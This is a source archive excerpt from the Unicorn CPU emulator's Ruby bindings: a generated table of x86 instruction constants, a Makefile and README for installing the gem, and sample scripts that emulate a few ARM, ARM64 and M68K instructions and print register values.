816 UC_X86_INS_VFMADDSUBPS = 817 UC_X86_INS_VFMADDSUB213PS = 818 UC_X86_INS_VFMADDSUB231PS = 819 UC_X86_INS_VFMSUB132PD = 820 UC_X86_INS_VFMSUB132PS = 821 UC_X86_INS_VFMSUBADD132PD = 822 UC_X86_INS_VFMSUBADD132PS = 823 UC_X86_INS_VFMSUBADDPD = 824 UC_X86_INS_VFMSUBADD213PD = 825 UC_X86_INS_VFMSUBADD231PD = 826 UC_X86_INS_VFMSUBADDPS = 827 UC_X86_INS_VFMSUBADD213PS = 828 UC_X86_INS_VFMSUBADD231PS = 829 UC_X86_INS_VFMSUBPD = 830 UC_X86_INS_VFMSUB213PD = 831 UC_X86_INS_VFMSUB231PD = 832 UC_X86_INS_VFMSUBPS = 833 UC_X86_INS_VFMSUB213PS = 834 UC_X86_INS_VFMSUB231PS = 835 UC_X86_INS_VFMSUBSD = 836 UC_X86_INS_VFMSUB213SD = 837 UC_X86_INS_VFMSUB132SD = 838 UC_X86_INS_VFMSUB231SD = 839 UC_X86_INS_VFMSUBSS = 840 UC_X86_INS_VFMSUB213SS = 841 UC_X86_INS_VFMSUB132SS = 842 UC_X86_INS_VFMSUB231SS = 843 UC_X86_INS_VFNMADD132PD = 844 UC_X86_INS_VFNMADD132PS = 845 UC_X86_INS_VFNMADDPD = 846 UC_X86_INS_VFNMADD213PD = 847 UC_X86_INS_VFNMADD231PD = 848 UC_X86_INS_VFNMADDPS = 849 UC_X86_INS_VFNMADD213PS = 850 UC_X86_INS_VFNMADD231PS = 851 UC_X86_INS_VFNMADDSD = 852 UC_X86_INS_VFNMADD213SD = 853 UC_X86_INS_VFNMADD132SD = 854 UC_X86_INS_VFNMADD231SD = 855 UC_X86_INS_VFNMADDSS = 856 UC_X86_INS_VFNMADD213SS = 857 UC_X86_INS_VFNMADD132SS = 858 UC_X86_INS_VFNMADD231SS = 859 UC_X86_INS_VFNMSUB132PD = 860 UC_X86_INS_VFNMSUB132PS = 861 UC_X86_INS_VFNMSUBPD = 862 UC_X86_INS_VFNMSUB213PD = 863 UC_X86_INS_VFNMSUB231PD = 864 UC_X86_INS_VFNMSUBPS = 865 UC_X86_INS_VFNMSUB213PS = 866 UC_X86_INS_VFNMSUB231PS = 867 UC_X86_INS_VFNMSUBSD = 868 UC_X86_INS_VFNMSUB213SD = 869 UC_X86_INS_VFNMSUB132SD = 870 UC_X86_INS_VFNMSUB231SD = 871 UC_X86_INS_VFNMSUBSS = 872 UC_X86_INS_VFNMSUB213SS = 873 UC_X86_INS_VFNMSUB132SS = 874 UC_X86_INS_VFNMSUB231SS = 875 UC_X86_INS_VFRCZPD = 876 UC_X86_INS_VFRCZPS = 877 UC_X86_INS_VFRCZSD = 878 UC_X86_INS_VFRCZSS = 879 UC_X86_INS_VORPD = 880 UC_X86_INS_VORPS = 881 UC_X86_INS_VXORPD = 882 UC_X86_INS_VXORPS = 883 UC_X86_INS_VGATHERDPD = 884 UC_X86_INS_VGATHERDPS = 885 UC_X86_INS_VGATHERPF0DPD = 886 UC_X86_INS_VGATHERPF0DPS = 887 UC_X86_INS_VGATHERPF0QPD = 888 UC_X86_INS_VGATHERPF0QPS = 889 UC_X86_INS_VGATHERPF1DPD = 890 UC_X86_INS_VGATHERPF1DPS = 891 UC_X86_INS_VGATHERPF1QPD = 892 UC_X86_INS_VGATHERPF1QPS = 893 UC_X86_INS_VGATHERQPD = 894 UC_X86_INS_VGATHERQPS = 895 UC_X86_INS_VHADDPD = 896 UC_X86_INS_VHADDPS = 897 UC_X86_INS_VHSUBPD = 898 UC_X86_INS_VHSUBPS = 899 UC_X86_INS_VINSERTF128 = 900 UC_X86_INS_VINSERTF32X4 = 901 UC_X86_INS_VINSERTF32X8 = 902 UC_X86_INS_VINSERTF64X2 = 903 UC_X86_INS_VINSERTF64X4 = 904 UC_X86_INS_VINSERTI128 = 905 
UC_X86_INS_VINSERTI32X4 = 906 UC_X86_INS_VINSERTI32X8 = 907 UC_X86_INS_VINSERTI64X2 = 908 UC_X86_INS_VINSERTI64X4 = 909 UC_X86_INS_VINSERTPS = 910 UC_X86_INS_VLDDQU = 911 UC_X86_INS_VLDMXCSR = 912 UC_X86_INS_VMASKMOVDQU = 913 UC_X86_INS_VMASKMOVPD = 914 UC_X86_INS_VMASKMOVPS = 915 UC_X86_INS_VMAXPD = 916 UC_X86_INS_VMAXPS = 917 UC_X86_INS_VMAXSD = 918 UC_X86_INS_VMAXSS = 919 UC_X86_INS_VMCALL = 920 UC_X86_INS_VMCLEAR = 921 UC_X86_INS_VMFUNC = 922 UC_X86_INS_VMINPD = 923 UC_X86_INS_VMINPS = 924 UC_X86_INS_VMINSD = 925 UC_X86_INS_VMINSS = 926 UC_X86_INS_VMLAUNCH = 927 UC_X86_INS_VMLOAD = 928 UC_X86_INS_VMMCALL = 929 UC_X86_INS_VMOVQ = 930 UC_X86_INS_VMOVDDUP = 931 UC_X86_INS_VMOVD = 932 UC_X86_INS_VMOVDQA32 = 933 UC_X86_INS_VMOVDQA64 = 934 UC_X86_INS_VMOVDQA = 935 UC_X86_INS_VMOVDQU16 = 936 UC_X86_INS_VMOVDQU32 = 937 UC_X86_INS_VMOVDQU64 = 938 UC_X86_INS_VMOVDQU8 = 939 UC_X86_INS_VMOVDQU = 940 UC_X86_INS_VMOVHLPS = 941 UC_X86_INS_VMOVHPD = 942 UC_X86_INS_VMOVHPS = 943 UC_X86_INS_VMOVLHPS = 944 UC_X86_INS_VMOVLPD = 945 UC_X86_INS_VMOVLPS = 946 UC_X86_INS_VMOVMSKPD = 947 UC_X86_INS_VMOVMSKPS = 948 UC_X86_INS_VMOVNTDQA = 949 UC_X86_INS_VMOVNTDQ = 950 UC_X86_INS_VMOVNTPD = 951 UC_X86_INS_VMOVNTPS = 952 UC_X86_INS_VMOVSD = 953 UC_X86_INS_VMOVSHDUP = 954 UC_X86_INS_VMOVSLDUP = 955 UC_X86_INS_VMOVSS = 956 UC_X86_INS_VMOVUPD = 957 UC_X86_INS_VMOVUPS = 958 UC_X86_INS_VMPSADBW = 959 UC_X86_INS_VMPTRLD = 960 UC_X86_INS_VMPTRST = 961 UC_X86_INS_VMREAD = 962 UC_X86_INS_VMRESUME = 963 UC_X86_INS_VMRUN = 964 UC_X86_INS_VMSAVE = 965 UC_X86_INS_VMULPD = 966 UC_X86_INS_VMULPS = 967 UC_X86_INS_VMULSD = 968 UC_X86_INS_VMULSS = 969 UC_X86_INS_VMWRITE = 970 UC_X86_INS_VMXOFF = 971 UC_X86_INS_VMXON = 972 UC_X86_INS_VPABSB = 973 UC_X86_INS_VPABSD = 974 UC_X86_INS_VPABSQ = 975 UC_X86_INS_VPABSW = 976 UC_X86_INS_VPACKSSDW = 977 UC_X86_INS_VPACKSSWB = 978 UC_X86_INS_VPACKUSDW = 979 UC_X86_INS_VPACKUSWB = 980 UC_X86_INS_VPADDB = 981 UC_X86_INS_VPADDD = 982 UC_X86_INS_VPADDQ = 983 UC_X86_INS_VPADDSB = 984 UC_X86_INS_VPADDSW = 985 UC_X86_INS_VPADDUSB = 986 UC_X86_INS_VPADDUSW = 987 UC_X86_INS_VPADDW = 988 UC_X86_INS_VPALIGNR = 989 UC_X86_INS_VPANDD = 990 UC_X86_INS_VPANDND = 991 UC_X86_INS_VPANDNQ = 992 UC_X86_INS_VPANDN = 993 UC_X86_INS_VPANDQ = 994 UC_X86_INS_VPAND = 995 UC_X86_INS_VPAVGB = 996 UC_X86_INS_VPAVGW = 997 UC_X86_INS_VPBLENDD = 998 UC_X86_INS_VPBLENDMB = 999 UC_X86_INS_VPBLENDMD = 1000 UC_X86_INS_VPBLENDMQ = 1001 UC_X86_INS_VPBLENDMW = 1002 UC_X86_INS_VPBLENDVB = 1003 UC_X86_INS_VPBLENDW = 1004 UC_X86_INS_VPBROADCASTB = 1005 UC_X86_INS_VPBROADCASTD = 1006 UC_X86_INS_VPBROADCASTMB2Q = 1007 UC_X86_INS_VPBROADCASTMW2D = 1008 UC_X86_INS_VPBROADCASTQ = 1009 UC_X86_INS_VPBROADCASTW = 1010 UC_X86_INS_VPCLMULQDQ = 1011 UC_X86_INS_VPCMOV = 1012 UC_X86_INS_VPCMPB = 1013 UC_X86_INS_VPCMPD = 1014 UC_X86_INS_VPCMPEQB = 1015 UC_X86_INS_VPCMPEQD = 1016 UC_X86_INS_VPCMPEQQ = 1017 UC_X86_INS_VPCMPEQW = 1018 UC_X86_INS_VPCMPESTRI = 1019 UC_X86_INS_VPCMPESTRM = 1020 UC_X86_INS_VPCMPGTB = 1021 UC_X86_INS_VPCMPGTD = 1022 UC_X86_INS_VPCMPGTQ = 1023 UC_X86_INS_VPCMPGTW = 1024 UC_X86_INS_VPCMPISTRI = 1025 UC_X86_INS_VPCMPISTRM = 1026 UC_X86_INS_VPCMPQ = 1027 UC_X86_INS_VPCMPUB = 1028 UC_X86_INS_VPCMPUD = 1029 UC_X86_INS_VPCMPUQ = 1030 UC_X86_INS_VPCMPUW = 1031 UC_X86_INS_VPCMPW = 1032 UC_X86_INS_VPCOMB = 1033 UC_X86_INS_VPCOMD = 1034 UC_X86_INS_VPCOMPRESSD = 1035 UC_X86_INS_VPCOMPRESSQ = 1036 UC_X86_INS_VPCOMQ = 1037 UC_X86_INS_VPCOMUB = 1038 UC_X86_INS_VPCOMUD = 1039 UC_X86_INS_VPCOMUQ = 1040 UC_X86_INS_VPCOMUW = 1041 
UC_X86_INS_VPCOMW = 1042 UC_X86_INS_VPCONFLICTD = 1043 UC_X86_INS_VPCONFLICTQ = 1044 UC_X86_INS_VPERM2F128 = 1045 UC_X86_INS_VPERM2I128 = 1046 UC_X86_INS_VPERMD = 1047 UC_X86_INS_VPERMI2D = 1048 UC_X86_INS_VPERMI2PD = 1049 UC_X86_INS_VPERMI2PS = 1050 UC_X86_INS_VPERMI2Q = 1051 UC_X86_INS_VPERMIL2PD = 1052 UC_X86_INS_VPERMIL2PS = 1053 UC_X86_INS_VPERMILPD = 1054 UC_X86_INS_VPERMILPS = 1055 UC_X86_INS_VPERMPD = 1056 UC_X86_INS_VPERMPS = 1057 UC_X86_INS_VPERMQ = 1058 UC_X86_INS_VPERMT2D = 1059 UC_X86_INS_VPERMT2PD = 1060 UC_X86_INS_VPERMT2PS = 1061 UC_X86_INS_VPERMT2Q = 1062 UC_X86_INS_VPEXPANDD = 1063 UC_X86_INS_VPEXPANDQ = 1064 UC_X86_INS_VPEXTRB = 1065 UC_X86_INS_VPEXTRD = 1066 UC_X86_INS_VPEXTRQ = 1067 UC_X86_INS_VPEXTRW = 1068 UC_X86_INS_VPGATHERDD = 1069 UC_X86_INS_VPGATHERDQ = 1070 UC_X86_INS_VPGATHERQD = 1071 UC_X86_INS_VPGATHERQQ = 1072 UC_X86_INS_VPHADDBD = 1073 UC_X86_INS_VPHADDBQ = 1074 UC_X86_INS_VPHADDBW = 1075 UC_X86_INS_VPHADDDQ = 1076 UC_X86_INS_VPHADDD = 1077 UC_X86_INS_VPHADDSW = 1078 UC_X86_INS_VPHADDUBD = 1079 UC_X86_INS_VPHADDUBQ = 1080 UC_X86_INS_VPHADDUBW = 1081 UC_X86_INS_VPHADDUDQ = 1082 UC_X86_INS_VPHADDUWD = 1083 UC_X86_INS_VPHADDUWQ = 1084 UC_X86_INS_VPHADDWD = 1085 UC_X86_INS_VPHADDWQ = 1086 UC_X86_INS_VPHADDW = 1087 UC_X86_INS_VPHMINPOSUW = 1088 UC_X86_INS_VPHSUBBW = 1089 UC_X86_INS_VPHSUBDQ = 1090 UC_X86_INS_VPHSUBD = 1091 UC_X86_INS_VPHSUBSW = 1092 UC_X86_INS_VPHSUBWD = 1093 UC_X86_INS_VPHSUBW = 1094 UC_X86_INS_VPINSRB = 1095 UC_X86_INS_VPINSRD = 1096 UC_X86_INS_VPINSRQ = 1097 UC_X86_INS_VPINSRW = 1098 UC_X86_INS_VPLZCNTD = 1099 UC_X86_INS_VPLZCNTQ = 1100 UC_X86_INS_VPMACSDD = 1101 UC_X86_INS_VPMACSDQH = 1102 UC_X86_INS_VPMACSDQL = 1103 UC_X86_INS_VPMACSSDD = 1104 UC_X86_INS_VPMACSSDQH = 1105 UC_X86_INS_VPMACSSDQL = 1106 UC_X86_INS_VPMACSSWD = 1107 UC_X86_INS_VPMACSSWW = 1108 UC_X86_INS_VPMACSWD = 1109 UC_X86_INS_VPMACSWW = 1110 UC_X86_INS_VPMADCSSWD = 1111 UC_X86_INS_VPMADCSWD = 1112 UC_X86_INS_VPMADDUBSW = 1113 UC_X86_INS_VPMADDWD = 1114 UC_X86_INS_VPMASKMOVD = 1115 UC_X86_INS_VPMASKMOVQ = 1116 UC_X86_INS_VPMAXSB = 1117 UC_X86_INS_VPMAXSD = 1118 UC_X86_INS_VPMAXSQ = 1119 UC_X86_INS_VPMAXSW = 1120 UC_X86_INS_VPMAXUB = 1121 UC_X86_INS_VPMAXUD = 1122 UC_X86_INS_VPMAXUQ = 1123 UC_X86_INS_VPMAXUW = 1124 UC_X86_INS_VPMINSB = 1125 UC_X86_INS_VPMINSD = 1126 UC_X86_INS_VPMINSQ = 1127 UC_X86_INS_VPMINSW = 1128 UC_X86_INS_VPMINUB = 1129 UC_X86_INS_VPMINUD = 1130 UC_X86_INS_VPMINUQ = 1131 UC_X86_INS_VPMINUW = 1132 UC_X86_INS_VPMOVDB = 1133 UC_X86_INS_VPMOVDW = 1134 UC_X86_INS_VPMOVM2B = 1135 UC_X86_INS_VPMOVM2D = 1136 UC_X86_INS_VPMOVM2Q = 1137 UC_X86_INS_VPMOVM2W = 1138 UC_X86_INS_VPMOVMSKB = 1139 UC_X86_INS_VPMOVQB = 1140 UC_X86_INS_VPMOVQD = 1141 UC_X86_INS_VPMOVQW = 1142 UC_X86_INS_VPMOVSDB = 1143 UC_X86_INS_VPMOVSDW = 1144 UC_X86_INS_VPMOVSQB = 1145 UC_X86_INS_VPMOVSQD = 1146 UC_X86_INS_VPMOVSQW = 1147 UC_X86_INS_VPMOVSXBD = 1148 UC_X86_INS_VPMOVSXBQ = 1149 UC_X86_INS_VPMOVSXBW = 1150 UC_X86_INS_VPMOVSXDQ = 1151 UC_X86_INS_VPMOVSXWD = 1152 UC_X86_INS_VPMOVSXWQ = 1153 UC_X86_INS_VPMOVUSDB = 1154 UC_X86_INS_VPMOVUSDW = 1155 UC_X86_INS_VPMOVUSQB = 1156 UC_X86_INS_VPMOVUSQD = 1157 UC_X86_INS_VPMOVUSQW = 1158 UC_X86_INS_VPMOVZXBD = 1159 UC_X86_INS_VPMOVZXBQ = 1160 UC_X86_INS_VPMOVZXBW = 1161 UC_X86_INS_VPMOVZXDQ = 1162 UC_X86_INS_VPMOVZXWD = 1163 UC_X86_INS_VPMOVZXWQ = 1164 UC_X86_INS_VPMULDQ = 1165 UC_X86_INS_VPMULHRSW = 1166 UC_X86_INS_VPMULHUW = 1167 UC_X86_INS_VPMULHW = 1168 UC_X86_INS_VPMULLD = 1169 UC_X86_INS_VPMULLQ = 1170 UC_X86_INS_VPMULLW = 1171 
UC_X86_INS_VPMULUDQ = 1172 UC_X86_INS_VPORD = 1173 UC_X86_INS_VPORQ = 1174 UC_X86_INS_VPOR = 1175 UC_X86_INS_VPPERM = 1176 UC_X86_INS_VPROTB = 1177 UC_X86_INS_VPROTD = 1178 UC_X86_INS_VPROTQ = 1179 UC_X86_INS_VPROTW = 1180 UC_X86_INS_VPSADBW = 1181 UC_X86_INS_VPSCATTERDD = 1182 UC_X86_INS_VPSCATTERDQ = 1183 UC_X86_INS_VPSCATTERQD = 1184 UC_X86_INS_VPSCATTERQQ = 1185 UC_X86_INS_VPSHAB = 1186 UC_X86_INS_VPSHAD = 1187 UC_X86_INS_VPSHAQ = 1188 UC_X86_INS_VPSHAW = 1189 UC_X86_INS_VPSHLB = 1190 UC_X86_INS_VPSHLD = 1191 UC_X86_INS_VPSHLQ = 1192 UC_X86_INS_VPSHLW = 1193 UC_X86_INS_VPSHUFB = 1194 UC_X86_INS_VPSHUFD = 1195 UC_X86_INS_VPSHUFHW = 1196 UC_X86_INS_VPSHUFLW = 1197 UC_X86_INS_VPSIGNB = 1198 UC_X86_INS_VPSIGND = 1199 UC_X86_INS_VPSIGNW = 1200 UC_X86_INS_VPSLLDQ = 1201 UC_X86_INS_VPSLLD = 1202 UC_X86_INS_VPSLLQ = 1203 UC_X86_INS_VPSLLVD = 1204 UC_X86_INS_VPSLLVQ = 1205 UC_X86_INS_VPSLLW = 1206 UC_X86_INS_VPSRAD = 1207 UC_X86_INS_VPSRAQ = 1208 UC_X86_INS_VPSRAVD = 1209 UC_X86_INS_VPSRAVQ = 1210 UC_X86_INS_VPSRAW = 1211 UC_X86_INS_VPSRLDQ = 1212 UC_X86_INS_VPSRLD = 1213 UC_X86_INS_VPSRLQ = 1214 UC_X86_INS_VPSRLVD = 1215 UC_X86_INS_VPSRLVQ = 1216 UC_X86_INS_VPSRLW = 1217 UC_X86_INS_VPSUBB = 1218 UC_X86_INS_VPSUBD = 1219 UC_X86_INS_VPSUBQ = 1220 UC_X86_INS_VPSUBSB = 1221 UC_X86_INS_VPSUBSW = 1222 UC_X86_INS_VPSUBUSB = 1223 UC_X86_INS_VPSUBUSW = 1224 UC_X86_INS_VPSUBW = 1225 UC_X86_INS_VPTESTMD = 1226 UC_X86_INS_VPTESTMQ = 1227 UC_X86_INS_VPTESTNMD = 1228 UC_X86_INS_VPTESTNMQ = 1229 UC_X86_INS_VPTEST = 1230 UC_X86_INS_VPUNPCKHBW = 1231 UC_X86_INS_VPUNPCKHDQ = 1232 UC_X86_INS_VPUNPCKHQDQ = 1233 UC_X86_INS_VPUNPCKHWD = 1234 UC_X86_INS_VPUNPCKLBW = 1235 UC_X86_INS_VPUNPCKLDQ = 1236 UC_X86_INS_VPUNPCKLQDQ = 1237 UC_X86_INS_VPUNPCKLWD = 1238 UC_X86_INS_VPXORD = 1239 UC_X86_INS_VPXORQ = 1240 UC_X86_INS_VPXOR = 1241 UC_X86_INS_VRCP14PD = 1242 UC_X86_INS_VRCP14PS = 1243 UC_X86_INS_VRCP14SD = 1244 UC_X86_INS_VRCP14SS = 1245 UC_X86_INS_VRCP28PD = 1246 UC_X86_INS_VRCP28PS = 1247 UC_X86_INS_VRCP28SD = 1248 UC_X86_INS_VRCP28SS = 1249 UC_X86_INS_VRCPPS = 1250 UC_X86_INS_VRCPSS = 1251 UC_X86_INS_VRNDSCALEPD = 1252 UC_X86_INS_VRNDSCALEPS = 1253 UC_X86_INS_VRNDSCALESD = 1254 UC_X86_INS_VRNDSCALESS = 1255 UC_X86_INS_VROUNDPD = 1256 UC_X86_INS_VROUNDPS = 1257 UC_X86_INS_VROUNDSD = 1258 UC_X86_INS_VROUNDSS = 1259 UC_X86_INS_VRSQRT14PD = 1260 UC_X86_INS_VRSQRT14PS = 1261 UC_X86_INS_VRSQRT14SD = 1262 UC_X86_INS_VRSQRT14SS = 1263 UC_X86_INS_VRSQRT28PD = 1264 UC_X86_INS_VRSQRT28PS = 1265 UC_X86_INS_VRSQRT28SD = 1266 UC_X86_INS_VRSQRT28SS = 1267 UC_X86_INS_VRSQRTPS = 1268 UC_X86_INS_VRSQRTSS = 1269 UC_X86_INS_VSCATTERDPD = 1270 UC_X86_INS_VSCATTERDPS = 1271 UC_X86_INS_VSCATTERPF0DPD = 1272 UC_X86_INS_VSCATTERPF0DPS = 1273 UC_X86_INS_VSCATTERPF0QPD = 1274 UC_X86_INS_VSCATTERPF0QPS = 1275 UC_X86_INS_VSCATTERPF1DPD = 1276 UC_X86_INS_VSCATTERPF1DPS = 1277 UC_X86_INS_VSCATTERPF1QPD = 1278 UC_X86_INS_VSCATTERPF1QPS = 1279 UC_X86_INS_VSCATTERQPD = 1280 UC_X86_INS_VSCATTERQPS = 1281 UC_X86_INS_VSHUFPD = 1282 UC_X86_INS_VSHUFPS = 1283 UC_X86_INS_VSQRTPD = 1284 UC_X86_INS_VSQRTPS = 1285 UC_X86_INS_VSQRTSD = 1286 UC_X86_INS_VSQRTSS = 1287 UC_X86_INS_VSTMXCSR = 1288 UC_X86_INS_VSUBPD = 1289 UC_X86_INS_VSUBPS = 1290 UC_X86_INS_VSUBSD = 1291 UC_X86_INS_VSUBSS = 1292 UC_X86_INS_VTESTPD = 1293 UC_X86_INS_VTESTPS = 1294 UC_X86_INS_VUNPCKHPD = 1295 UC_X86_INS_VUNPCKHPS = 1296 UC_X86_INS_VUNPCKLPD = 1297 UC_X86_INS_VUNPCKLPS = 1298 UC_X86_INS_VZEROALL = 1299 UC_X86_INS_VZEROUPPER = 1300 UC_X86_INS_WAIT = 1301 UC_X86_INS_WBINVD = 1302 
UC_X86_INS_WRFSBASE = 1303 UC_X86_INS_WRGSBASE = 1304 UC_X86_INS_WRMSR = 1305 UC_X86_INS_XABORT = 1306 UC_X86_INS_XACQUIRE = 1307 UC_X86_INS_XBEGIN = 1308 UC_X86_INS_XCHG = 1309 UC_X86_INS_XCRYPTCBC = 1310 UC_X86_INS_XCRYPTCFB = 1311 UC_X86_INS_XCRYPTCTR = 1312 UC_X86_INS_XCRYPTECB = 1313 UC_X86_INS_XCRYPTOFB = 1314 UC_X86_INS_XEND = 1315 UC_X86_INS_XGETBV = 1316 UC_X86_INS_XLATB = 1317 UC_X86_INS_XRELEASE = 1318 UC_X86_INS_XRSTOR = 1319 UC_X86_INS_XRSTOR64 = 1320 UC_X86_INS_XRSTORS = 1321 UC_X86_INS_XRSTORS64 = 1322 UC_X86_INS_XSAVE = 1323 UC_X86_INS_XSAVE64 = 1324 UC_X86_INS_XSAVEC = 1325 UC_X86_INS_XSAVEC64 = 1326 UC_X86_INS_XSAVEOPT = 1327 UC_X86_INS_XSAVEOPT64 = 1328 UC_X86_INS_XSAVES = 1329 UC_X86_INS_XSAVES64 = 1330 UC_X86_INS_XSETBV = 1331 UC_X86_INS_XSHA1 = 1332 UC_X86_INS_XSHA256 = 1333 UC_X86_INS_XSTORE = 1334 UC_X86_INS_XTEST = 1335 UC_X86_INS_FDISI8087_NOP = 1336 UC_X86_INS_FENI8087_NOP = 1337 UC_X86_INS_ENDING = 1338
unicorn-2.1.1/bindings/ruby/
unicorn-2.1.1/bindings/ruby/Makefile
# Ruby binding for Unicorn engine. Sascha Schirra <sashs@scoding.de>

.PHONY: gen_const

# Use bundle install && rake to install gem and test
install: gen_const
	cd unicorn_gem && rake build
	cd unicorn_gem && gem install --local pkg/unicorn-engine-2.1.1.gem

gen_const:
	cd .. && python3 const_generator.py ruby
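The gen_const target regenerates the Ruby constant files (such as the UC_X86_INS_* table above) via const_generator.py; the generated names are plain top-level Ruby constants, so a script only needs to require the per-architecture module. A minimal sketch, assuming the gem is installed:

# a minimal sketch of consuming a generated constant
require 'unicorn_engine'
require 'unicorn_engine/x86_const'
include UnicornEngine

puts UC_X86_INS_SYSCALL # => 699, matching the generated table above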
unicorn-2.1.1/bindings/ruby/README.md
# Installation

## Software requirements

### Linux
- ruby >= 1.9.3
- rubygems
- make
- gcc

### Mac OS
- ruby >= 1.9.3
- rubygems
- make
- XCode

## Install unicorn

* cd path_to_unicorn
* ./make.sh install

## Install ruby binding

* cd bindings/ruby
* make install
unicorn-2.1.1/bindings/ruby/sample_arm.rb
#!/usr/bin/env ruby
require 'unicorn_engine'
require 'unicorn_engine/arm_const'

include UnicornEngine

# code to be emulated
ARM_CODE = "\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3
THUMB_CODE = "\x83\xb0" # sub sp, #0xc

# memory address where emulation starts
ADDRESS = 0x10000

# callback for tracing basic blocks
$hook_block = Proc.new do |uc, address, size, user_data|
    puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size])
end

# callback for tracing instructions
$hook_code = Proc.new do |uc, address, size, user_data|
    puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size])
end

# Test ARM
def test_arm()
    puts("Emulate ARM code")
    begin
        # Initialize emulator in ARM mode
        mu = Uc.new UC_ARCH_ARM, UC_MODE_ARM

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, ARM_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM_REG_R0, 0x1234)
        mu.reg_write(UC_ARM_REG_R2, 0x6789)
        mu.reg_write(UC_ARM_REG_R3, 0x3333)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, $hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, $hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + ARM_CODE.bytesize)

        # now print out some registers
        puts(">>> Emulation done. 
Below is the CPU context") r0 = mu.reg_read(UC_ARM_REG_R0) r1 = mu.reg_read(UC_ARM_REG_R1) puts(">>> R0 = 0x%x" % r0) puts(">>> R1 = 0x%x" % r1) rescue UcError => e puts("ERROR: %s" % e) end end def test_thumb() puts("Emulate THUMB code") begin # Initialize emulator in thumb mode mu = Uc.new UC_ARCH_ARM, UC_MODE_THUMB # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, THUMB_CODE) # initialize machine registers mu.reg_write(UC_ARM_REG_SP, 0x1234) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") sp = mu.reg_read(UC_ARM_REG_SP) puts(">>> SP = 0x%x" % sp) rescue UcError => e puts("ERROR: %s" % e) end end test_arm() puts("=" * 20) test_thumb() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_arm64.rb���������������������������������������������������������0000664�0000000�0000000�00000003630�14675241067�0020603�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Ruby sample ported by Sascha Schirra <sashs82@gmail.com> require 'unicorn_engine' require 'unicorn_engine/arm64_const' include UnicornEngine # code to be emulated ARM64_CODE = "\xab\x01\x0f\x8b" #add x11, x13, x15 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test ARM64 def test_arm64() puts("Emulate ARM64 code") begin # Initialize emulator in ARM mode mu = Uc.new UC_ARCH_ARM64, UC_MODE_ARM # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, ARM64_CODE) # initialize machine registers mu.reg_write(UC_ARM64_REG_X11, 0x1234) mu.reg_write(UC_ARM64_REG_X13, 0x6789) mu.reg_write(UC_ARM64_REG_X15, 0x3333) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + ARM64_CODE.bytesize) # now print out some registers puts(">>> Emulation done. 
Below is the CPU context") x11 = mu.reg_read(UC_ARM64_REG_X11) x13 = mu.reg_read(UC_ARM64_REG_X13) x15 = mu.reg_read(UC_ARM64_REG_X15) puts(">>> X11 = 0x%x" % x11) rescue UcError => e puts("ERROR: %s" % e) end end test_arm64() ��������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_m68k.rb����������������������������������������������������������0000664�0000000�0000000�00000003317�14675241067�0020441�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Ruby sample ported by Sascha Schirra <sashs82@gmail.com> require 'unicorn_engine' require 'unicorn_engine/m68k_const' include UnicornEngine # code to be emulated M68K_CODE = "\x76\xed" # movq #-19, %d3 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test m68k def test_m68k() puts("Emulate M68K code") begin # Initialize emulator in m68k mode mu = Uc.new UC_ARCH_M68K, UC_MODE_BIG_ENDIAN # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, M68K_CODE) # initialize machine registers mu.reg_write(UC_M68K_REG_D3, 0x1234) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + M68K_CODE.bytesize) # now print out some registers puts(">>> Emulation done. Below is the CPU context") d3 = mu.reg_read(UC_M68K_REG_D3) puts(">>> D3 = 0x%x" % d3) rescue UcError => e puts("ERROR: %s" % e) end end test_m68k() 